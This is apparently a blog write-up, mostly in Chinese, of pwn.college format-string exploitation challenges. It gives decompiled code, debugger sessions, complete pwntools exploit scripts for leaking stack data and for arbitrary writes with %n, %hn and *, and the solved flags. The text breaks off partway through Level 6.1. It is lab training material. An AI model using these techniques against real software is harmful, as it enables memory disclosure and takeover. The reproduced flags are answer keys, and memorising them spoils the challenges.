It’s a thrilling intellectual puzzle, unlocking the secrets of a program from the inside out.
Description 你别吓我,万一我 IQ 没及格怎么办?那不是炸了??
玩点简单的 (probably)?智力游戏吧~泄漏/篡改数据神技,小子,是不是应该学透彻?
Level 1.0
- Category: Pwn
Use a format string exploit to reveal a string stored on the stack.
12 collapsed lines
unsigned __int64 func(){ unsigned int v0; // eax int v1; // eax _BYTE v3[456]; // [rsp+0h] [rbp-1E0h] BYREF unsigned __int64 v4; // [rsp+1C8h] [rbp-18h] __int64 savedregs; // [rsp+1E0h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+1E8h] [rbp+8h] BYREF
v4 = __readfsqword(0x28u); sp_ = (__int64)v3; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - v3) >> 3) + 2; rp_ = (__int64)&retaddr; memset(&v3[16], 0, 0x1B0uLL); v0 = time(0LL); srand(v0); *(_DWORD *)&v3[112] = 0; while ( *(int *)&v3[112] <= 14 ) { v3[*(int *)&v3[112]] = rand() % 26 + 65; ++*(_DWORD *)&v3[112]; } v3[15] = 0; *(_QWORD *)&v3[80] = v3; puts("There is a 15-character uppercase secret password hidden on the stack!"); puts("If you find it, you will be given the flag!"); putchar(10);17 collapsed lines
printf("The secret password is located at %p and the stack pointer is located at %p.\n", &v3[80], (const void *)sp_); printf( "The difference between these addresses is: %d (%d / 8).\n", (unsigned __int64)&v3[-sp_ + 80] >> 3, (unsigned int)&v3[-sp_ + 80]); printf("This means, before the printf, the arguments to the format string will look something like:\n"); printf("%p:\t[SECRET_PASSWORD]\n", &v3[80]); *(_DWORD *)&v3[112] = 0; while ( *(int *)&v3[112] < (unsigned __int64)&v3[-sp_ + 80] >> 3 ) { printf("%p:\t[?]\n", &v3[-8 - 8LL * *(int *)&v3[112] + 80]); ++*(_DWORD *)&v3[112]; } puts("R9:\t\t[?]"); puts("R8:\t\t[?]"); puts("RCX:\t\t[?]"); puts("RDX:\t\t[?]"); puts("RSI:\t\t[?]"); puts("RDI:\t\t[FORMAT_STRING]"); printf("I will now read up to %d bytes. Send your data!\n", 256); *(_DWORD *)&v3[116] = read(0, &v3[149], 0x100uLL); v3[*(int *)&v3[116] + 149] = 0; printf("Received %d bytes!\n", *(_DWORD *)&v3[116]); putchar(10); printf("I will now call printf on your data!\n"); putchar(10); printf(&v3[149], 256LL); putchar(10); puts("What is the secret password?"); *(_DWORD *)&v3[116] = read(0, &v3[96], 0xFuLL); v3[*(int *)&v3[116] + 96] = 0; if ( !strcmp(*(const char **)&v3[80], &v3[96]) ) { puts("Correct Password!"); v1 = open("/flag", 0); sendfile(1, v1, 0LL, 0x400uLL); } else { puts("Wrong Password!");3 collapsed lines
} return __readfsqword(0x28u) ^ v4;}
第一题,核心伪代码如上,会随机生成一串字符串到栈上某个位置,绿色部分会判断输入是否和栈上的随机字符串相符,成立则输出 flag。
红色部分直接把输入作为 printf()
的 const char *format
再简单计算一下随机字符串在栈上第几位,加上 6 (RDI
) 就是我们需要泄漏的参数位了。
Breakpoint 1, 0x00005b65398e08db in func ()LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────── RAX 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ' RBX 0x7ffe30164a18 —▸ 0x7ffe3016677b ◂— '/home/cub3y0nd/Projects/pwn.college/babyfmt_level1.0' RCX 0x7b2b06f98a21 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 0x7ffe30164740 ◂— 0xa /* '\n' */ RDI 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ' RSI 0x7ffe30164740 ◂— 0xa /* '\n' */ R8 0x64 R9 0xffffffff R10 0 R11 0x246 R12 1 R13 0 R14 0x7b2b070e5000 (_rtld_global) —▸ 0x7b2b070e62e0 —▸ 0x5b65398df000 ◂— 0x10102464c457f R15 0 RBP 0x7ffe301648c0 —▸ 0x7ffe301648f0 —▸ 0x7ffe30164990 —▸ 0x7ffe301649f0 ◂— 0 RSP 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ' RIP 0x5b65398e08db (func+936) ◂— call strcmp@plt─────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────── ► 0x5b65398e08db <func+936> call strcmp@plt <strcmp@plt> s1: 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ' s2: 0x7ffe30164740 ◂— 0xa /* '\n' */
0x5b65398e08e0 <func+941> test eax, eax 0x5b65398e08e2 <func+943> jne func+1005 <func+1005>
0x5b65398e08e4 <func+945> lea rdi, [rip + 0xa60] RDI => 0x5b65398e134b ◂— 'Correct Password!' 0x5b65398e08eb <func+952> call puts@plt <puts@plt>
0x5b65398e08f0 <func+957> mov esi, 0 ESI => 0 0x5b65398e08f5 <func+962> lea rdi, [rip + 0xa61] RDI => 0x5b65398e135d ◂— 0x72570067616c662f /* '/flag' */ 0x5b65398e08fc <func+969> mov eax, 0 EAX => 0 0x5b65398e0901 <func+974> call open@plt <open@plt>
0x5b65398e0906 <func+979> mov ebx, eax 0x5b65398e0908 <func+981> mov ecx, 0x400 ECX => 0x400───────────────────────────────────[ STACK ]───────────────────────────────────00:0000│ rax rdi rsp 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'01:0008│-1d8 0x7ffe301646e8 ◂— 0x51485748424d52 /* 'RMBHWHQ' */02:0010│-1d0 0x7ffe301646f0 ◂— 0... ↓ 5 skipped─────────────────────────────────[ BACKTRACE ]───────────────────────────────── ► 0 0x5b65398e08db func+936 1 0x5b65398e0a53 main+264 2 0x7b2b06eb2e08 None 3 0x7b2b06eb2ecc __libc_start_main+140 4 0x5b65398e022e _start+46───────────────────────────────────────────────────────────────────────────────pwndbg> stack 3000:0000│ rax rdi rsp 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'01:0008│-1d8 0x7ffe301646e8 ◂— 0x51485748424d52 /* 'RMBHWHQ' */02:0010│-1d0 0x7ffe301646f0 ◂— 0... ↓ 7 skipped0a:0050│-190 0x7ffe30164730 —▸ 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'0b:0058│-188 0x7ffe30164738 ◂— 00c:0060│ rdx rsi 0x7ffe30164740 ◂— 0xa /* '\n' */0d:0068│-178 0x7ffe30164748 ◂— 00e:0070│-170 0x7ffe30164750 ◂— 0x10000000a /* '\n' */0f:0078│-168 0x7ffe30164758 ◂— 0... ↓ 2 skipped12:0090│-150 0x7ffe30164770 ◂— 0xa000000000013:0098│-148 0x7ffe30164778 ◂— 0... ↓ 10 skippedpwndbg> dist 0x7ffe30164730 $rsp0x7ffe30164730->0x7ffe301646e0 is -0x50 bytes (-0xa words)pwndbg> p/d 0x50/8+6$1 = 16
from contextlib import contextmanager
from pwn import ELF, context, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level1.0"HOST, PORT = "localhost", 1337
gdbscript = """c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(leak_offset): payload = f"%{leak_offset}$s".encode()
return payload
def attack(target): try: payload = construct_payload(16)
target.send(payload) target.recvuntil(b"I will now call printf on your data!\n\n")
password = target.recv(0xF) target.sendafter(b"What is the secret password?\n", password)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch() as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{UGd_h1EnEGQDMhB1PSrD81fSSXs.dZTM0MDL5cTNxgzW}
Level 1.1
- Category: Pwn
Use a format string exploit to reveal a string stored on the stack.
参见 Level 1.0。
from contextlib import contextmanager
from pwn import ELF, context, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level1.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(leak_offset): payload = f"%{leak_offset}$s".encode()
return payload
def attack(target): try: payload = construct_payload(10)
target.send(payload) target.recvuntil(b"I will now call printf on your data!\n\n")
password = target.recv(0xF) target.sendafter(b"What is the secret password?\n", password)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch() as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{UQu4aFVleX5KV74QVvgMLBddqc-.ddTM0MDL5cTNxgzW}
Level 2.0
- Category: Pwn
Use a format string exploit to reveal a string stored on the stack.
Breakpoint 1, 0x00005a05148a88fe in func ()LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────── RAX 0x7ffe6d89d0a0 ◂— 'VCOMITKAHQHVEVP' RBX 0x7ffe6d89d438 —▸ 0x7ffe6d89e77b ◂— '/home/cub3y0nd/Projects/pwn.college/babyfmt_level2.0' RCX 0x71da28ecea21 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 0x7ffe6d89d0b0 ◂— 0xa /* '\n' */ RDI 0x7ffe6d89d0a0 ◂— 'VCOMITKAHQHVEVP' RSI 0x7ffe6d89d0b0 ◂— 0xa /* '\n' */ R8 0x64 R9 0xffffffff R10 0 R11 0x246 R12 1 R13 0 R14 0x71da2901b000 (_rtld_global) —▸ 0x71da2901c2e0 —▸ 0x5a05148a7000 ◂— 0x10102464c457f R15 0 RBP 0x7ffe6d89d2e0 —▸ 0x7ffe6d89d310 —▸ 0x7ffe6d89d3b0 —▸ 0x7ffe6d89d410 ◂— 0 RSP 0x7ffe6d89d040 ◂— 0x800000 RIP 0x5a05148a88fe (func+971) ◂— call strcmp@plt─────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────── ► 0x5a05148a88fe <func+971> call strcmp@plt <strcmp@plt> s1: 0x7ffe6d89d0a0 ◂— 'VCOMITKAHQHVEVP' s2: 0x7ffe6d89d0b0 ◂— 0xa /* '\n' */
0x5a05148a8903 <func+976> test eax, eax 0x5a05148a8905 <func+978> jne func+1040 <func+1040>
0x5a05148a8907 <func+980> lea rdi, [rip + 0xaad] RDI => 0x5a05148a93bb ◂— 'Correct Password!' 0x5a05148a890e <func+987> call puts@plt <puts@plt>
0x5a05148a8913 <func+992> mov esi, 0 ESI => 0 0x5a05148a8918 <func+997> lea rdi, [rip + 0xaae] RDI => 0x5a05148a93cd ◂— 0x72570067616c662f /* '/flag' */ 0x5a05148a891f <func+1004> mov eax, 0 EAX => 0 0x5a05148a8924 <func+1009> call open@plt <open@plt>
0x5a05148a8929 <func+1014> mov ebx, eax 0x5a05148a892b <func+1016> mov ecx, 0x400 ECX => 0x400───────────────────────────────────[ STACK ]───────────────────────────────────00:0000│ rsp 0x7ffe6d89d040 ◂— 0x80000001:0008│-298 0x7ffe6d89d048 —▸ 0x7ffe6d89d0a0 ◂— 'VCOMITKAHQHVEVP'02:0010│-290 0x7ffe6d89d050 ◂— 0... ↓ 5 skipped─────────────────────────────────[ BACKTRACE ]───────────────────────────────── ► 0 0x5a05148a88fe func+971 1 0x5a05148a8a76 main+264 2 0x71da28de8e08 None 3 0x71da28de8ecc __libc_start_main+140 4 0x5a05148a822e _start+46───────────────────────────────────────────────────────────────────────────────pwndbg> x/2gx 0x7ffe6d89d0a00x7ffe6d89d0a0: 0x414b54494d4f4356 0x0050564556485148pwndbg> x/s 0x7ffe6d89d0a00x7ffe6d89d0a0: "VCOMITKAHQHVEVP"pwndbg> dist $rdi $rsp0x7ffe6d89d0a0->0x7ffe6d89d040 is -0x60 bytes (-0xc words)pwndbg> p/d 0x60/8+6$1 = 18
这次我剑走偏锋,不用 %s
了,而是尝试用更麻烦一点的 %llx
输出栈上保存的随机字符串值,转换为 ASCII。因为小端序,所以还需要再反转一下。
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote, unhex
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level2.0"HOST, PORT = "localhost", 1337
gdbscript = """c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(): payload = b"%18$llx%19$llx"
return payload
def attack(target): try: payload = construct_payload()
target.send(payload) target.recvuntil(b"I will now call printf on your data!\n\n")
password = flat( unhex(target.recv(2 * 8))[::-1], unhex(target.recv(2 * 7))[::-1], )
target.sendafter(b"What is the secret password?\n", password)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch() as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{QZG8MJMHwVhFNzjDx4guy6MBfEL.dhTM0MDL5cTNxgzW}
Level 2.1
- Category: Pwn
Use a format string exploit to reveal a string stored on the stack.
参见 Level 2.0。
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote, unhex
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level2.1"HOST, PORT = "localhost", 1337
gdbscript = """c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(): payload = b"%18$llx%19$llx"
return payload
def attack(target): try: payload = construct_payload()
target.send(payload) target.recvuntil(b"I will now call printf on your data!\n\n")
password = flat( unhex(target.recv(2 * 8))[::-1], unhex(target.recv(2 * 7))[::-1], )
target.sendafter(b"What is the secret password?\n", password)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch() as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{MjTMloC44qXLBonimJ5i3Zq3ux-.dlTM0MDL5cTNxgzW}
Level 3.0
- Category: Pwn
Use a format string exploit to read the flag directly from the .bss section.
这题直接把 flag 读到 .bss
段了,所以思路很简单,就是把 .bss
的地址写到栈上某个位置,然后通过 %s
注意一定是先输入 fmtstr 再接地址,这个应该不需要解释吧。
遇事别慌多调试,debugger 是你的 gf,你还不懂吗。
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level3.0"HOST, PORT = "localhost", 1337
gdbscript = """b *func+436b *func+549c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(position, data_offset): return flat( f"aaa%{position}$s\x00", elf.bss() + data_offset, )
def attack(target): try: payload = construct_payload(16, 0x70)
target.sendafter(b"Send your data!", payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{coYB13XxKYo3asb6os4GxIefmpC.dBjM0MDL5cTNxgzW}
Level 3.1
- Category: Pwn
Use a format string exploit to read the flag directly from the .bss section.
参见 Level 3.0。
睡了一天为什么还是好困,不写了,睡觉觉,在想明天或者以后要不要写一个技巧向专题?明天得学学 ret2csu
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level3.1"HOST, PORT = "localhost", 1337
gdbscript = """b *func+310c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(position, data_offset): return flat( f"%{position}$s\x00", elf.bss() + data_offset, )
def attack(target): try: payload = construct_payload(20, 0x90)
target.sendafter(b"Send your data!", payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{UtDc1WIH6qas-RrhigjZpPLWMUP.dFjM0MDL5cTNxgzW}
Level 4.0
- Category: Pwn
Use a format string exploit to set a global variable.
4 collapsed lines
int check_win(){ int v0; // eax
puts("Checking win value..."); printf("... desired win value: %#lx\n", 194LL); printf("... written win value: %#lx\n", qword_404160); if ( qword_404160 != 0xC2 ) return puts("... INCORRECT!"); puts("... SUCCESS! Here is your flag:"); v0 = open("/flag", 0); return sendfile(1, v0, 0LL, 0x80uLL);}
输出 flag 的条件是 .bss
段上的 qword_404160
变量值为 0xC2
,为了满足这一条件,我们直接用 %n
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level4.0"HOST, PORT = "localhost", 1337
gdbscript = """b *func+293b *check_win+77c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(position, var_offset): return flat( f"aaaa%190x%{position}$n\x00".encode("ascii"), elf.bss() + var_offset, )
def attack(target): try: payload = construct_payload(29, 0xC0)
target.sendafter(b"Send your data!", payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{MrJaEVG2FM1QGKYUbL8GjOyBkhg.dJjM0MDL5cTNxgzW}
Level 4.1
- Category: Pwn
Use a format string exploit to set a global variable.
参见 Level 4.0。
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level4.1"HOST, PORT = "localhost", 1337
gdbscript = """b *func+191b *check_win+77c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(position, var_offset): return flat( f"aaaaa%116x%{position}$n\x00".encode("ascii"), elf.bss() + var_offset, )
def attack(target): try: payload = construct_payload(30, 0x40)
target.sendafter(b"Send your data!", payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{gYbZ_KMoDIuA2cpDPTK3F8hxiEo.dNjM0MDL5cTNxgzW}
Level 5.0
- Category: Pwn
Use a format string exploit to set a larger global variable.
4 collapsed lines
int check_win(){ int v0; // eax
puts("Checking win value..."); printf("... desired win value: %#lx\n", 0x82802F819C27A46ALL); printf("... written win value: %#lx\n", qword_4040F8); if ( qword_4040F8 != 0x82802F819C27A46ALL ) return puts("... INCORRECT!"); puts("... SUCCESS! Here is your flag:"); v0 = open("/flag", 0); return sendfile(1, v0, 0LL, 0x80uLL);}
对于这种巨大的数值的策略是我们可以分组写,按 2 字节一组应该是不错的选项。第一组写起来应该是没有任何坑的,注意栈对齐加减字节即可;第二组开始则应该减去前一组写入的字节数再 % 0x10000
,这是为了回环到 [0x00, 0xFF]
这个区间,这样就确保了 %n
评价一下我的码风好不好看 1/31/2025。
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level5.0"HOST, PORT = "localhost", 1337
gdbscript = """b *func+315b *check_win+82c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(position, var_offset): parts = [0xA46A, 0x9C27, 0x2F81, 0x8280]
align_stack = b"a" * 0x3 align_offset = len(align_stack)
fmtstr = ( b"".join( f"%{(parts[i] - (align_offset if i == 0 else parts[i - 1])) % 0x10000}x%{position + i}$hn".encode( "ascii" ) for i in range(len(parts)) ) + b"\x00" ) addresses = [elf.bss() + var_offset + (0x2 * i) for i in range(4)]
return flat( align_stack, fmtstr, *addresses, )
def attack(target): try: payload = construct_payload(45, 0x58)
target.sendafter(b"Send your data!", payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{wRZzRCQlIP6gytdVI6FYHhTLMom.dRjM0MDL5cTNxgzW}
Level 5.1
- Category: Pwn
Use a format string exploit to set a larger global variable.
参见 Level 5.0。
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level5.1"HOST, PORT = "localhost", 1337
gdbscript = """b *func+213b *check_win+82c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(position, var_offset): parts = [0x15C7, 0x32CC, 0x2869, 0x2872]
align_stack = b"a" * 0x6 align_offset = len(align_stack)
fmtstr = ( b"".join( f"%{(parts[i] - (align_offset if i == 0 else parts[i - 1])) % 0x10000}x%{position + i}$hn".encode( "ascii" ) for i in range(len(parts)) ) + b"\x00" ) addresses = [elf.bss() + var_offset + (0x2 * i) for i in range(4)]
return flat( align_stack, fmtstr, *addresses, )
def attack(target): try: payload = construct_payload(39, 0xA8)
target.sendafter(b"Send your data!", payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{sjfLqAt2jCG0OYV91dJi9052Hf4.dVjM0MDL5cTNxgzW}
Level 6.0
- Category: Pwn
Use a format string exploit to copy a value and overwrite a global variable.
12 collapsed lines
unsigned __int64 func(){ int v0; // eax unsigned int v1; // eax _QWORD v3[63]; // [rsp+0h] [rbp-200h] BYREF unsigned __int64 v4; // [rsp+1F8h] [rbp-8h] __int64 savedregs; // [rsp+200h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+208h] [rbp+8h] BYREF
v4 = __readfsqword(0x28u); sp_ = (__int64)v3; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v3) >> 3) + 2; rp_ = (__int64)&retaddr; memset(v3, 0, sizeof(v3)); v0 = open("/dev/urandom", 0, v3); read(v0, &v3[62], 3uLL); v1 = time(0LL); srand(v1); puts("This challenge requires you to set a win value, located in the .bss, to a secret value! This secret value");11 collapsed lines
puts("is currently stored in a stack variable, and you will have to figure out how to copy it into the .bss."); puts("There are two options: do a leak (using one printf) followed by a write (using a second printf), or use"); printf("a _dynamic padding size_, using the * format character, in combination with %%n, in a _single_ printf,\n"); puts("to copy memory. Since this level only gives you a single printf() call, you will likely need to use the"); puts("latter. Check the printf man page (in category 3: `man 3 printf`) for documentation on *.\n"); puts("As before, if you successfully pull that off, the challenge will give you the flag!"); putchar(10); printf( "The win value in the .bss is located at %p! Remember to write this in little endian in your format string.\n", &qword_404158); printf("Remember, you can swap %%n with %%lx to see what address you will be writing into to make sure you have the."); puts("correct offset.\n"); printf("The secret value is located on the stack, %#x bytes after the start of your format string!\n\n", 325); printf("I will now read up to %d bytes. Send your data!\n", 256); HIDWORD(v3[12]) = read(0, (char *)&v3[21] + 3, 0x100uLL); *((_BYTE *)&v3[21] + SHIDWORD(v3[12]) + 3) = 0; printf("Received %d bytes!\n", HIDWORD(v3[12])); putchar(10); printf("I will now call printf on your data!\n"); putchar(10); printf((const char *)&v3[21] + 3, 256LL); putchar(10); puts("And now, let's check the win value!"); check_win(v3[62]); return __readfsqword(0x28u) ^ v4;}
4 collapsed lines
int __fastcall check_win(__int64 a1){ int v1; // eax
puts("Checking win value..."); printf("... desired win value: %#lx\n", a1); printf("... written win value: %#lx\n", qword_404158); if ( a1 != qword_404158 ) return puts("... INCORRECT!"); puts("... SUCCESS! Here is your flag:"); v1 = open("/flag", 0); return sendfile(1, v1, 0LL, 0x80uLL);}
这题就是读了一个三字节的随机值到栈上,给 flag 的条件是我们 .bss
段中的 qword_404158
变量值必须等于这个随机值。思路是用格式化字符串中的 * (specifies a dynamic padding size)
来 ‘copy memory’. 举个栗子:%*10$c
会把第十个参数的值用作 padding size,输出大小为 padding size 的内容。所以我们只要把这个 padding size 通过 %n
写入就相当于实现了 ‘copy memory’ 了。
这个方法这对于比较小的值还好,太大了就不太友善了,cuz bunch of spaces.
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level6.0"HOST, PORT = "localhost", 1337
gdbscript = """b *func+173b *func+417b *check_win+79c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(random_value_position, position, var_offset): return flat( f"%*{random_value_position}$c%{position}$naaaaaaaaa\x00", elf.bss() + var_offset, )
def attack(target): try: payload = construct_payload(68, 30, 0xB8)
target.sendafter(b"Send your data!", payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{ExgmxPb8JckvvOZvTLw9kufKyFP.dZjM0MDL5cTNxgzW}
Level 6.1
- Category: Pwn
Use a format string exploit to copy a value and overwrite a global variable.
参见 Level 6.0。
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level6.1"HOST, PORT = "localhost", 1337
gdbscript = """b *func+100b *func+305b *check_win+79c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(random_value_position, position, var_offset): return flat( f"%*{random_value_position}$c%{position}$naaaaaaaaaaa\x00", elf.bss() + var_offset, )
def attack(target): try: payload = construct_payload(66, 31, 0xB8)
